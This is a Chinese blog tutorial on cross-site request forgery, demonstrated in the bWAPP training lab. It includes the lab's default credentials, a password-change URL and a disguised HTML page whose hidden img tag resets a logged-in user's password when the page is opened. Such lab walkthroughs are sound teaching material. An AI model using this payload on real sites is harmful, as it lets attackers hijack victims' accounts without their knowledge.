31、CSRF漏洞介绍

简介: 31、CSRF漏洞介绍

CSRF:跨站请求伪造,伪装成用户身份来执行一些非用户自愿的恶意以及非法操作

CSRF和XSS区别:

1、CSRF需要登陆后操作,XSS不需要

2、CSRF通过伪装成受信任用户请求受信任的网站

一、环境:BWAPP


二、登陆,默认账号为:bee,密码为:bug


0a2653c851af460fa595bd959398a8f1.png

三、选择从在csrf的页面,将密码修改为1111,change


0eacb84100b54626af849e6b562bf92a.png

四、分析url


http://192.168.1.119/bwapp/csrf_1.php?password_new=1111&password_conf=1111&action=change

五、退出账号,重新登陆一下,密码已经修改为1111


六、重修修改一下url,直接访问这个这个地址,


http://192.168.1.119/bwapp/csrf_1.php?password_new=2222&password_conf=2222&action=change

密码被重置为2222

七、隐蔽利用


1、新建一个html页面,将url地址重新修改一下,添加到img标签下的src属性,

<!DOCTYPE html>
<html>
<head>
  <title>哎呦不错哦。。。</title>
</head>
  <body>
       <h2>好久不见<h2>
    <img src="http://192.168.1.119/bwapp/csrf_1.php?password_new=3333&password_conf=3333&action=change">
  </body>
</html>

2、访问这个htmll,自动访问修改后的url,密码也自动修改了

禁止非法,后果自负

目录
打赏
0
0
0
0
115
分享
相关文章
CSRF漏洞利用工具 -- CSRFTester
CSRF漏洞利用工具 -- CSRFTester
303 0
小课堂 -- CSRF漏洞介绍
小课堂 -- CSRF漏洞介绍
57 0
互联网并发与安全系列教程(06) - 常见的Web安全漏洞(CSRF攻击)
互联网并发与安全系列教程(06) - 常见的Web安全漏洞(CSRF攻击)
142 0
2024全网最全面及最新的网络安全技巧 二 之 CSRF+XSS漏洞的各类利用技巧
2024全网最全面及最新的网络安全技巧 二 之 CSRF+XSS漏洞的各类利用技巧
Web漏洞挖掘:XSS与CSRF防护策略
【7月更文挑战第11天】XSS和CSRF作为Web应用中常见的安全漏洞,对系统安全构成了严重威胁。通过实施上述防护策略,可以有效减少这些漏洞的风险。然而,Web安全攻防是一个持续不断的过程,开发者需要持续关注应用的安全性,更新和修补安全漏洞,同时加强自身的安全意识和防范技能,以确保Web应用的安全性和稳定性。
第二轮学习笔记:CSRF跨站请求伪造漏洞
第二轮学习笔记:CSRF跨站请求伪造漏洞
61 0
AI助理

你好,我是AI助理

可以解答问题、推荐解决方案等